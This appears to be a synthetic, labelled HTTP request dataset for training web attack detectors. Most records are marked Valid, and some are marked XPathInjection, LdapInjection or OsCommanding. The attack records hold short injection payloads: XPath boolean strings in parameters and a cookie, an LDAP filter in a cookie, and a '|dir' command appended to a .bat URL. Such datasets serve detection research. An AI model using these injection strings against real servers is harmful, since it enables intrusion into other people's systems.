Warning: 438 49.79.91.51:038 "rCeoI3u9lEt" "Sat, 30 Apr 05 03:17:12 GMT"
X-Forwarded-For: 208.109.201.230
X-Serial-Number: 08954851223
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22961
Start - Id: 26248
class: Valid
GET /rNwWo/eeYeodSai/t4c1Thn/ThSAgy/msZIggzyF/KaXAMw3/yuc-pAGludH/ls4euTnwMucoAdeeayt/m9Owq.shtml?lmtyor=802234467&qmUmfotjith1=9105&he25oie=cr5BfE_p0h&hms7Wmt72yOr=pYcE9&rnhbrshohyDe=aertldoeee1E4&oclEb=348110652&83oe5i=+r+&rmrwvuDN=t0on0&F@QgmochaiDZCIncf=riiaahtaccesaeueU&fooeh4sprensEdw=rmDwhD8lm5%40c&eeemtc=hE_20&ghseo=c%3Anwcu&ardtieIbhru=xoo%7Cd%27xml30po&ntdsdo=si+ HTTP/1.0
Host: 60.58.123.79:80
Connection: close
Accept: text/*;q=0.7, image/jpeg;q=0.6
Accept-Charset: *
Accept-Encoding: identity, compress
Accept-Language: *;q=0.2
Cache-Control: gi6s='e1ooel'
Client-ip: 70.146.111.185
Cookie: mtiiseeueeytm=61370956;U60jtynot=dokgroup bye;a8=CSOtulthnitut09ewN
Cookie2: $Version="197"
Date: Wed, 01 Jul 09 24:50:51 UTC
ETag: W/"PahjqMqeR_i92PJxyGq"
Expect: igoe3
From: nFledhng@FadgstE.de
If-Modified-Since: Mon, 05 Jun 06 12:27:46 UTC
If-Unmodified-Since: Sat, 11 Oct 08 20:24:39 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 30 Nov 04 01:27:57 GMT
Max-Forwards: 7977
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: Digest uri=http://ismiws.org/bltnhue/eeeeezo.gif
Authorization: Basic ZXRzWUk6c2lzbENxbg==
Range: 47781-
Referer: http://www.hogrbin.biz/htgae/etaltfO/n7Ae/r7s9fvhe/h0d5h.pdf
TE: trailers,gzip;q=0.6
Trailer: Referer
User-Agent: Ireekoe (sj8a0HPdhL; ee5waWdIVk; eOYzo1; s7Mx6SAw-; nGtIJ9NJ)
UA-CPU: PowerPC
UA-Disp: 9474,169,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 857x6835
Via: 9.6 www.wosrrhcd.png
Transfer-Encoding: identity
Upgrade: geoaa/5.5, tnh/2.0, wawlno/4.1
Warning: 531 230.161.120.55 "hes9keeim" "Thu, 01 Dec 05 19:57:34 CET"
X-Forwarded-For: 248.73.239.249
X-Serial-Number: 4037485153
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26248
Start - Id: 12083
class: Valid
GET /ro/2mdd6masipc/oLcK/etgnFs/Tgtk2vbscript.adminus/wmRtp3s/eahkB/a2_elTxXx5QwPsGs4Ro.jpeg? HTTP/1.0
Host: www.6birfe.fr:80
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: x-mac-arabic, cp-936;q=0.2, macintosh, shift_jis
Accept-Encoding: 
Accept-Language: 4-chatYctb;q=0.1, m-achz, r-esE
Cache-Control: min-fresh=01
Client-ip: 237.166.198.113
Cookie: VS0Ax=7902573;Wwltteuosmedswa=s? 7s3;execrCBCUY=de3s1hwame6t
Cookie2: $Version="08"
Date: Thu, 08 Jan 04 15:28:01 CET
ETag: "dXpI4cLssmr0mH-UnG"
Expect: onaNtti6=wymieb
From: k9srctlU@gEhaot2P.gov
If-Modified-Since: Thu, 19 Nov 09 12:46:01 GMT
If-Unmodified-Since: Thu, 01 May 08 19:49:41 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 30 Apr 10 09:09:35 GMT
Max-Forwards: 6329
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: NTLM cXlncnZpOW9qcmppYTlvdHFvODZiM2Rpcmx5dXR5bWVvbGFndDhhZThybDd2
Authorization: Basic c2Vhc2JhOnJvdG50
Range: 86737-87721,-9149,666-
Referer: /eHEo8eHh/rccikg/pzhdfdun.php3
TE: trailers,chunked;q=0.4,chunked;q=0.6
Trailer: User-Agent
User-Agent: Mozilla/8.3 (Machintosh; U; PPC Mac OS X 5.2; ts-th; rv:0.2.6) Gecko/44891017
UA-CPU: Sparc
UA-Disp: 750,6227,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 701x262
Via: wfrix/2.8 www.tdetxp8e.gif, HTTP/4.8 www.wnezsuo8.jpg, 4.7 www.okxaj.tiff
Transfer-Encoding: compress
Upgrade: lhn/9.1, n2szc/3.8
Warning: 141 72.168.224.187 "venRvrhuuSnNeznp56h2" 
X-Forwarded-For: 149.30.227.159
X-Serial-Number: 739755
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12083
Start - Id: 22712
class: Valid
GET /n_.GprIBtoeT/aHfSGxaY-bp-U1/Mlv/e8HH1WBiH00k3jK9QMT/sbOCoeQrnFWdD.html?joo=nHjo&Ein8br=opmd3iideS1o5ohtsl&nrz=pDUXq74G&lLpbinqiMfVM=6022&n2Rw5tSb=iu8.Z&Octncnqynox=70&z.Zm%uGwp-replacem=78&miJN=-c&ynaehnp=Shttpsc9&tnqnoacpn=xvtjcheh%25&ioh=e.SkV HTTP/1.0
Host: www.flTEnr.de
Connection: close
Accept: image/*, audio/*
Accept-Charset: utf-7;q=0.1, x-mac-japanese
Accept-Encoding: 
Accept-Language: hOhecre-ijeteee, VlScu9-e9feou
Cache-Control: 9leewa5=cAki1oo
Client-ip: 133.5.30.129
Cookie: weval4UQIq2F=  ehols6aWxp_e;grstoitt1tta=ep
Cookie2: $Version="4"
Date: Thu, 15 Jul 04 14:05:31 CET
ETag: W/"XUHbUD3CedbGOUJ@"
Expect: 100-continue
From: itnsrE@1aewnr4e.biz
If-Modified-Since: Fri, 25 Sep 09 11:37:56 CET
If-Unmodified-Since: Thu, 14 Apr 05 18:20:07 CET
If-Match: *
If-None-Match: *
If-Range: "qWB7w1XNWtHFdTz.T"
Max-Forwards: 909
MIME-Version: 2.0
Pragma: jtA='iyLds4sa'
Proxy-Authorization: rtlb 73ekwxd=dgoEe
Authorization: NTLM ZWhlc3l4aWVlcWQ1dzdnaHl1YWFzZWh0c2x1b3lpYWxkdGlpTmVlZW9uZmV2dWU=
Range: -0811
Referer: http://08aeon.st/aNrt2oa.jpeg
TE: trailers
Trailer: Max-Forwards
User-Agent: fpcponcue/8.7
UA-CPU: x86
UA-Disp: 949,175,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 0084x738
Via: 7.9 14.44.255.172
Transfer-Encoding: deflate
Upgrade: npstdo/2.1, Bagih/0.7, ysdS/4.0, iMl/4.5
Warning: 287 114.101.191.4 "analt2uUr8sles" 
X-Forwarded-For: 57.171.74.241
X-Serial-Number: 46126280
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22712
Start - Id: 22772
class: Valid
GET /7F@S/DVi3/oHtnsitdteGitnizzi/3.nxlTb/gg/sPmwlli/f6hUVldU6OZ_JLPlu-/.A573Vrmexec_h0dN/tsrrrj/ne/cDktbE-P/CuEsrtaOoiamnE.exe?wuecuhnsodetu=oAfIinote8sc2ohNs&blmn6=45778&rtA=x8loCpGGelO&ob9osa9bn=92590&ucbimih8ntnt3=%27zchMupdateg%5C&tPeer=hmafl2c&xs9anoct=lhraS1%2Fkt%3A3toEe&dt=tmetzgdx2%2Bpasswduo&tyapir4=Feno4 HTTP/1.0
Host: www.hsaeneweje.ch:80
Connection: edarbreo
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.5, identity;q=0.9, identity, compress, identity
Accept-Language: 5mchmnrn-amelz;q=0.0
Cache-Control: min-fresh=10295
Client-ip: 111.76.241.226
Cookie: uweanSa4bStot5m=[grng;sie=31;ge=h2GY8uP.W4hh;qQXYautoexec=a.bxXHWwWi2;hssehjnuy=tet|4
Cookie2: $Version="7"
Date: Wed, 29 Aug 07 21:20:09 CET
ETag: "koXigvcjUzSB2K0yR2"
Expect: A3ioh7yr=n5gecol;lmo0aaqh=amaurO
From: labOkeyp@Tmrr6ene.de
If-Modified-Since: Mon, 08 Aug 05 07:48:15 CET
If-Unmodified-Since: Tue, 26 Feb 08 19:38:20 UTC
If-Match: *
If-None-Match: "B1wlnq@SK5sh3Cn_U0"
If-Range: *
Max-Forwards: 54
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: NTLM cXNybnI0Z3RQc2M5c050dGV1aG5kc2RzcHRsYTVSZW9obnVoVGVqckI=
Authorization: Basic YzY0dDM6YmllbmlGaQ==
Range: -59247,23-
Referer: /n5oia/teraeear.mspx
TE: trailers
Trailer: Authorization
User-Agent: yoZnldloesh7sbYyn
UA-CPU: 68000
UA-Disp: 0788,9372,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 5579x6271
Via: FTP/4.1 www.eGo7s5.htm
Transfer-Encoding: gzip
Upgrade: zuf/1.3, ons/6.0, ctn/4.8
Warning: 293 www.trmrle.htm "kaAne" 
X-Forwarded-For: 247.95.67.80
X-Serial-Number: 913992778218417738
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 22772
Start - Id: 49609
class: XPathInjection
GET /siseevSc/telnetcPorNSkiQZ/YDEAV5Hwm/gt/mLMG9MB2Px/p-n76n/sna9zdorhc0tadyia7u/2@l/e6zBPtXN/sCg.@5@ZxC.cfm?t4Sn1r=zwsEiS%2Fa%2Fzr1%2Fchild%3A%3Anode%28%29%5B++++position%28%29%3D227%5D++%7C++++ol%2Fsiah%2FL%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D0%5D+or+%27qnaet%27++++%3D+++%27&ehw=tcrrando+NzcjOc8zsiihomen&naneiri=27702&8iaszelnhS=gtNp+eatOtG%3Cht1+stboot.iniE&tEEvep=atd&eox7xonrsh=tgrS1&ahpOzehrtr=ds%40h&esiss=qtyr+eh%3BeernsHm+l0%28&beasddtie=-cbdf5r85Fg&hlteo4eL=Eliuti%40%7Cf&2ohsw9tvpitedl=go9qhgtatfo&luakpsN4rps=olQ4Dz&f5=511 HTTP/1.0
Host: www.ohbsai.be
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: tte-haR, rnhUleEE-Oiu1aj;q=0.5, rceomr-H;q=0.3, s-i2dl4t
Cache-Control: no-store
Client-ip: 124.225.114.247
Cookie: telnetOZx='aite;Q@Kg=76;oyj-mSy9POu=nhlseNn'iHutao
Cookie2: $Version="4"
Date: Mon, 11 Jul 05 11:19:43 UTC
ETag: "dDzynAdXBl83z7Mz"
Expect: 100-continue
From: b3Tsmet@oiiienq.de
If-Modified-Since: Thu, 20 May 04 12:03:48 GMT
If-Unmodified-Since: Tue, 22 Sep 09 06:11:22 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 05 Oct 04 05:56:11 UTC
Max-Forwards: 969
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Basic MXlsUnRsbzpqZWFvb1kz
Authorization: Digest uri=/eleetoG/wpshkcg/s2isWw/uAei.bin
Range: 7852-
Referer: /eyhnatl/e0eeUamt/iuiymso.pl
TE: chunked;q=0.9
Trailer: Range
User-Agent: Mozilla/9.7 (X11; U; Unix 2.3; 5e-iq; rv:1.0.1) Gecko/05457358
UA-CPU: Sparc
UA-Disp: 1997,806,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 3223x940
Via: eiR9st/8.8 www.tE5ee.js
Transfer-Encoding: tbsn
Upgrade: add/2.5
Warning: 885 www.nan6nedo.jpeg "UhOln0iubuetrq" 
X-Forwarded-For: 94.116.73.204
X-Serial-Number: 9696710
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49609
Start - Id: 33530
class: Valid
PUT /sY_xhsW9pQC/Eaect/3wjS3q_n4Sng.shtml? HTTP/1.1
Content-Length: 273
Content-Language: ebnoaa,oh,hzel
Content-Encoding: gzip
Content-Location: /Yaboo/xks0e/dayryt.wmn
Content-MD5: c2VwTnNlZWdidHJvZ1Robg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 29 Jul 07 06:20:10 CET
Last-Modified: Sat, 04 Nov 06 19:24:23 CET
Host: 16.141.5.103
Connection: iih5
Accept: */*;q=0.0
Accept-Charset: shift_jis;q=0.7
Accept-Encoding: compress;q=0.7, compress;q=0.4
Accept-Language: J2wSkcty-ee;q=0.7
Cache-Control: no-store
Client-ip: 233.33.16.39
Cookie: Dar=9871745;hpIOrp1aeiro7=llmyohrrapodte;9teeUcsnauSf=tanz5nmnxqR?
Cookie2: $Version="4"
Date: Thu, 04 Nov 04 18:19:36 CET
ETag: "8d7tx@AdbGPU4WFyh"
Expect: 100-continue
From: Towr@gduxvle.gov
If-Modified-Since: Fri, 06 Aug 04 02:48:06 CET
If-Unmodified-Since: Wed, 13 Feb 08 22:28:34 GMT
If-Match: "is0iYSHtb7xf.BBWfqGV"
If-None-Match: "C5I4cKQ8Yjj22id6"
If-Range: Sat, 20 Mar 10 13:30:55 UTC
Max-Forwards: 7
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Basic QVRheXQ4c206RWVkc2VvaA==
Authorization: NTLM bGdyZWFlZWVhaXNub2FzZUcwb0VnaXJ3NGJzQ2RuYmNBaGE5ZVNkZQ==
Range: 90185-
Referer: http://www.ihm0r.be/pffs.mp3
TE: trailers,gzip;q=0.7,deflate
Trailer: Referer
User-Agent: Mozilla/5.8 (X11; U; Open BSD i386 4.3; tN-os; rv:1.6.1) Gecko/79015453
UA-CPU: PowerPC
UA-Disp: 9881,7058,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 417x756
Via: 0.2 71.216.21.132, 2.0 137.15.142.190, 2.5 www.ymytasqt.css
Transfer-Encoding: rf6t
Upgrade: ttnoi/1.2, yeetc/2.3
Warning: 030 www.ziH2lb.shtml:62230 "7hoidnee" "Sun, 21 May 06 11:51:24 CET"
X-Forwarded-For: 188.249.94.253
X-Serial-Number: 06516057
----: ------------------
~~~~~: ~~~~~~~~~~

Laicmfre5uhye=thtaccesSep8&4-samliqmutBncL= &zsamwhereiwZgzZdS=EeteeW&J36kcopy=mr 3&JH2mprocessing-instructiond=iahuhaInjnwuAoqaa&iaereWsanru2ag=Sw&etdroplxE&qmhvteebfOl=3198&lciaa=Pd7hs&oh=vg&ghrjeR=ob7_lx0&rdivVntH-R=tFteoe&UidocopyPx09=980354&pXPHphp=55&Cr1eadCA=74902

End - Id: 33530
Start - Id: 29839
class: Valid
GET /awdfmXA_q/6MpIJxgwuuC@K/pP/nh56x5PQ/rw/eesodCexeeaanami/0%ucDrcpidu7@QBU0k/njcabtaem2we/oTv-mFnS@tKErXL4u.shtml? HTTP/1.0
Host: 173.213.195.101
Connection: close
Accept: */*;q=0.8
Accept-Charset: ks_c_5601-1987;q=0.0, iso-8859-6;q=0.7, x-mac-arabic;q=0.9, windows-874;q=0.3, isiri-3342;q=0.1
Accept-Encoding: deflate
Accept-Language: n-ohs, Ah-wemv, 5l2a-EdiattB, becAeios-atxl;q=0.5
Cache-Control: min-fresh=4902
Client-ip: 87.144.209.9
Cookie: pmgpbeerehnfh=khm;29tE=f:<hott uDi=gG
Cookie2: $Version="15"
Date: Sun, 04 Feb 07 10:27:11 CET
ETag: "g5A9lbqV99VONZA"
Expect: Wlrke=ohtee1i;1teetsai
From: rbldtdG@o7aniAtsO.ch
If-Modified-Since: Wed, 24 May 06 02:03:15 UTC
If-Unmodified-Since: Sat, 27 Jun 09 24:38:27 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 5.7
Pragma: eaetts='LN1h'
Proxy-Authorization: msfja kissaf=Rn4lrtpj
Authorization: Basic YW5zbG5vOm9henpvbHI=
Range: -3,39-13,-175
Referer: /r9Naz9a/ybLfrrh7/hdh4e8r/1d8ge/ssseetN.sh
TE: trailers,deflate,trailers
Trailer: Expect
User-Agent: thlm/0.2.4.6.5
UA-CPU: x86
UA-Disp: 724,467,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 5691x8640
Via: 2.5 90.27.70.146:2
Transfer-Encoding: identity
Upgrade: erOt/8.8, dtrg5/5.2, sO4/0.6, 1jiLT/0.8
Warning: 407 224.95.62.105 "a9tsaazcrsTjarhmoi" "Thu, 13 Jul 06 11:51:43 CET"
X-Forwarded-For: 121.62.194.6
X-Serial-Number: 59564326
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 29839
Start - Id: 691
class: Valid
GET /_WCa_5AlN7r5Hgt/tS_.1T/bkerdocument99Y/rbE-OZXMLHIWHGHUTg/tjOqzoqAE0xX_I/3nullz9recni/nHpjaONIsbYf.Uq1fIJw/eM9nyibmXaKj9yQ_/9A.B_SVE/o4@klY5wimwz9UDDm-/meuwoie.pl?ue=7&hto9eiicuan=enrumQHeva&yClmd3csdbpq=rquR_&islidEllh3so=32002&oso5idaiiaez2i=k+3qafm&DQZg.r=orao%29&dpeidh6mdt=netcatasamj&beJ=nctareaisfv&eu5ln=ada5aeca6o&nioi=nne%5Camn%26acceptrnoa%29e%5Df&soret8=669528 HTTP/1.0
Host: 36.245.248.181:80
Connection: ctT0u
Accept: text/xml;q=0.2
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: max-stale
Client-ip: 80.195.233.91
Cookie: thegaenp=l wuoaou\Tcbe;oi=%u]ay;oasaeeag=nmhsab4;mCoh5rsjEh=huUqYBD-8;seiEaox=en%unoaHae;meeiebni6dhttcc=om
Cookie2: $Version="9"
Date: Sat, 15 Jul 06 06:18:45 GMT
ETag: W/"u8ql@tr3HaAANQtn"
Expect: 100-continue
From: nner@duenesjfts.gov
If-Modified-Since: Fri, 20 Aug 04 21:30:48 CET
If-Unmodified-Since: Fri, 27 Apr 07 19:34:01 GMT
If-Match: *
If-None-Match: "zA0G8-cQHal5_@rgaR6"
If-Range: Thu, 25 Aug 05 06:54:52 UTC
Max-Forwards: 78
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: Digest username="hihtp"
Authorization: Digest nc=42E03847
Range: 41-
Referer: http://www.gisamdg.st/mz4in/6mntx/retjt/hstes7ic/re97t.mpg
TE: chunked,trailers
Trailer: Transfer-Encoding
User-Agent: eGQtnu1mn http://www.ekso.fr
UA-CPU: x86
UA-Disp: 667,0755,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 312x096
Via: FTP/5.3 www.axfe.html, HTTP/1.3 135.232.121.13, 4.0 8.84.88.243:9
Transfer-Encoding: identity
Upgrade: oSn/9.1, 0siske/3.9, 0h5b/6.6, hkpn/7.4
Warning: 395 119.100.16.106 "T0trozfto" "Fri, 08 May 09 24:52:53 GMT"
X-Forwarded-For: 165.15.81.251
X-Serial-Number: 40090704001637847095
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 691
Start - Id: 37472
class: LdapInjection
GET /oz2hrt/Cm1ll/nq1jT5g/a6pNSQbGoYEMCdg.htm?tnoOjIq2lne=n6tij HTTP/1.1
Host: www.7tufatr.uk
Connection: keep-alive
Accept: */*
Cache-Control: only-if-cached
Cookie: 3A=Fshi)(&(objectClass  = aT*)
Cookie2: $Version="9"
Date: Thu, 23 Mar 06 08:12:06 UTC
If-Unmodified-Since: Fri, 26 Sep 08 09:05:57 CET
If-None-Match: "_9FN2dRVeKdjDjujO@"
MIME-Version: 5.3
Pragma: no-cache
Authorization: Basic Y3djbmg6cHRiWg==
Referer: http://www.d9ds.fr/trhld/ge20oa/osrl6yoh/5rlva.wav
User-Agent: vtn6ep (c0@M9L; sUwQ6jMC7e; ln-17jxK8; 38Esl3FTFk)
Via: 9.0 76.19.75.146:2

null

End - Id: 37472
Start - Id: 6618
class: Valid
PUT /dithoalr/rQXo@pjLGg_Q2kfifxOD/0lu1WrC/8lap1FYqzgLhB1/ulEaosthyioeesEr/LpservicesrQ/wJtelnetPh19o0-LS0HK/V_jwhere3Lv5np4/yEWR@7/uSo-Q4S/8f7Fq1DzfF./group byMT1Sdelete8.mspx? HTTP/1.0
Content-Length: 14
Content-Language: io,t,tr
Content-Encoding: compress
Content-Location: /jqoh/sbEeyaci/dg7Urna/eohE/tfrl.swf
Content-MD5: dGV3MGVBYTY3aHhpd2M3ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 22 Feb 04 03:41:47 UTC
Last-Modified: Sun, 25 Jul 04 23:23:03 UTC
Host: 138.123.38.245:80
Connection: pfrb6lis
Accept: */*
Accept-Charset: iso-8859-5
Accept-Encoding: 
Accept-Language: e-uiasia, anT-iyt0nex;q=0.7
Cache-Control: htlist='i'
Client-ip: 192.147.185.236
Cookie: irwOi0sie=xJkjWs;iEbn=and ODOcr7anteth;crU0iGyr=yxe9RqkJNxXh;Hfao9Rys2=n'r ;me0orE0ettro=w;nAsrt5iu=inetcatOeRauJ2Y
Cookie2: $Version="4"
Date: Wed, 20 Feb 08 09:39:08 CET
ETag: W/"FYE0W5lNQ0l@xjKWL"
Expect: nne990d=taieel0i
From: yl1dq7lA@wYd2.cz
If-Modified-Since: Sun, 08 Oct 06 21:54:48 CET
If-Unmodified-Since: Thu, 26 Aug 04 13:53:13 UTC
If-Match: *
If-None-Match: "w7JOdWSR7nhmMNIOx"
If-Range: Fri, 27 Apr 07 23:14:55 CET
Max-Forwards: 6270
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: zmtsI sarl0ue=aryfers
Authorization: NTLM MmFyWGZ5YW9vbTNkdHRtbmV0aW9ac2JkZWFhSVdlcWhleXdlYWVlbm9yc1VpZWFh
Range: 206000-,-838,294-02
Referer: /uixi/u70sn.jsp
TE: trailers,chunked;q=0.3
Trailer: Pragma
User-Agent: 5Axoupetx
UA-CPU: MIPS
UA-Disp: 7646,961,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 2928x871
Via: FTP/8.0 www.tmRieh.png
Transfer-Encoding: deflate
Upgrade: thsp8p/2.1, eptIic/7.2
Warning: 283 www.eca6ym.shtml "etwRhet2a2agoideekc" 
X-Forwarded-For: 101.21.26.57
X-Serial-Number: 43970651738336527001
----: --------------
~~~~~: ~~~~~~~~~~~

smfm=tmrtr$e

End - Id: 6618
Start - Id: 44356
class: OsCommanding
GET /ssi/envout.bat?|dir%20..............1 HTTP/1.0
Host: www.itIwyNVr.net
Connection: close
Accept: video/*, video/mpeg;q=0.8
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: wederlo9='Rb8l'
Client-ip: 206.144.99.228
Cookie: Btizoslto91er=cmdyxli
Cookie2: $Version="4"
Date: Mon, 15 Jun 09 24:03:22 GMT
ETag: "EeqXjCS5PORBp-bwP8v4"
Expect: 100-continue
From: oehrc@o8se.com
If-Modified-Since: Tue, 29 Jan 08 02:51:14 GMT
If-Unmodified-Since: Fri, 09 Nov 07 02:11:29 UTC
If-Match: *
If-None-Match: *
If-Range: "Om_ZesJafUZ9OevCH"
Max-Forwards: 9969
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: iHauOk iIeethi7=3ndhh
Authorization: Digest response="750EEeFddf3CD4eDAAABC5d54CeAD4BE"
Range: 40819-,5068-402487,51311-585888
Referer: http://www.ld7o.st/srn4s/uhejdrr.tar
TE: gzip;q=0.8
Trailer: Max-Forwards
User-Agent: Mozilla/2.0 (Machintosh; U; PPC 0.1; er-ld; rv:0.3.4) Gecko/52180622
UA-CPU: x86
UA-Disp: 5843,217,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 673x399
Via: 3.3 www.nea5ttS.css, sywoe/1.4 19.129.86.156:6, 8.9 73.48.109.8
Transfer-Encoding: identity
Upgrade: 4et/8.8, is0/1.7, mseCwu/8.0
Warning: 732 www.nidnAqoh.js "estaore5gordngon0ar" "Fri, 26 Nov 04 13:07:04 GMT"
X-Forwarded-For: 179.136.110.96
X-Serial-Number: 94309776768789
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44356
Start - Id: 5551
class: Valid
POST /Ttelnet9.jOF1tZqeR/nt28AUOfoyKLOnv/ouu7zfacar0i53/nyWwpvMIKUmAe1nFO/tIrI0varpassthruw/m4Xf4JxMkxbjITr0.0R/RcHH.C_wget-kalsWB/rrarask6oralMr8rtm/typn1thSbkmrze5m/ytsha8rcet/aS.mdb? HTTP/1.0
Content-Length: 19
Content-Language: is,la
Content-Encoding: deflate
Content-Location: /lbe3h/gttll9/etoli.aspx
Content-MD5: b2Nmc2xjaWFub3RuZXNpcw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 17 Aug 06 15:05:54 UTC
Last-Modified: Sun, 25 Nov 07 22:56:45 GMT
Host: 116.121.51.126:80
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 119.64.122.217
Cookie: iIaU6iowo=8tfu;204Hesoa=4882649;3lilont=17268;1sai=t5;swtrfneQrn=cYAh-Kv2Y3b
Cookie2: $Version="633"
Date: Mon, 06 Nov 06 23:47:44 UTC
ETag: W/"x-Vsn4wHKsPgPMe5_w0"
Expect: 100-continue
From: Ee7etP@xeyR4seoht.biz
If-Modified-Since: Sun, 11 Mar 07 01:56:12 GMT
If-Unmodified-Since: Wed, 23 Feb 05 10:59:54 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1285
MIME-Version: 1.1
Pragma: 3='ent'
Proxy-Authorization: Basic YXRvVGhuOnRvYTQ=
Authorization: NTLM bmVtNzV2bmN0WnhoYXRyYWFmZFRnb2Vkbm5sZDR1aXN6c2R0andzckU=
Range: 188-,1-78718,0-
Referer: /qhbtxt3.asmx
TE: trailers
Trailer: Referer
User-Agent: shMRc.ya http://www.2Smnt.de
UA-CPU: x86
UA-Disp: 0010,843,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 6340x801
Via: 3.8 37.183.207.135, 0.4 www.Hyyx.jpg
Transfer-Encoding: hnaee
Upgrade: eseJ/5.2, eTyY/2.2
Warning: 515 www.nnu4b.html:6 "c1oAatosDgemieiOeix" "Sun, 15 Nov 09 16:15:49 CET"
X-Forwarded-For: 71.229.52.229
X-Serial-Number: 5097796244152405039
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

atsmsucm=iFR&kr=e00

End - Id: 5551
Start - Id: 3897
class: Valid
PUT /EheelornbeAyOraHc7O/ohttiaiso2/xoharopiaedsnprarf/asi.exe? HTTP/1.0
Content-Length: 92
Content-Language: etaa,tg,egmDerEl
Content-Encoding: gzip
Content-Location: /6Eniv/tosaeish/nidehlth/nnXe.aspx
Content-MD5: ZGlsc2diZWh0YTJzaGk5bg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 28 Jun 05 10:08:09 GMT
Last-Modified: Sat, 01 Apr 06 02:24:09 UTC
Host: www.muntE.cz
Connection: iedf
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: gzip;q=0.5, compress, deflate
Accept-Language: *
Cache-Control: max-age=50078
Client-ip: 243.193.136.121
Cookie: rrite38htiethf=r68Vy_
Cookie2: $Version="795"
Date: Tue, 25 Dec 07 02:23:00 UTC
ETag: "bxyyir1MhmyaT3oI"
Expect: rult
From: iriuh@orcqa.com
If-Modified-Since: Mon, 20 Mar 06 22:26:07 UTC
If-Unmodified-Since: Tue, 17 Oct 06 09:11:56 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 06 Dec 06 11:19:03 GMT
Max-Forwards: 6
MIME-Version: 1.5
Pragma: ieh=ewohEnoi
Proxy-Authorization: eifolu 4ediEcn=nOfs3b
Authorization: anzup soEdr=jai3
Range: -7148,2780-
Referer: http://gri6f.gov/ihNzhly/c8embl/numriek.dll
TE: deflate,deflate;q=0.2,deflate
Trailer: User-Agent
User-Agent: Mozilla/8.1 (compatible; mhroliesd; Windows NT; oktf; wsieMtv)
UA-CPU: Sparc
UA-Disp: 837,1241,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 993x108
Via: HTTP/4.2 www.drir5.tiff
Transfer-Encoding: deflate
Upgrade: qbtdne/8.9
Warning: 738 www.osltlmZp.shtml:65942 "mnse" 
X-Forwarded-For: 18.27.104.194
X-Serial-Number: 537380175884943310
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

itreasOnsnh1ins=80014&eooadnmtehthns=9396439&pehtes7e5autrao=77099&tCFuups3no=gyse&mteioEi

End - Id: 3897
Start - Id: 48395
class: XPathInjection
GET /oL2asabl2fnhftl/ooahfrt/an0tltrir/Y2hbkMbodymochan/e-.tiff?ttsStps=aurmuiaewq%26V-+&mleTte=saeer5hg&hhure=ean&w6wcnddbmacnrt=eimSmtXTrM HTTP/1.0
Host: www.1wbdqry.org:80
Connection: 9iaNvWrK
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.1
Cache-Control: min-fresh=0507
Client-ip: 7.15.202.235
Cookie: Ldlraeydfw=aa'   or  path/child::node()[position()=N]    or  'ya'=   ';gdNatitLmlfr=aaArn;c6o=281220847;r4dtjcYpa=smi;nu2uuoynan=at|c;Emf3Kwcetrf=k3cuih4nae2mfdds
Cookie2: $Version="14"
Date: Thu, 30 Jul 09 17:10:14 UTC
ETag: "xP2PorFEATog8OPD01."
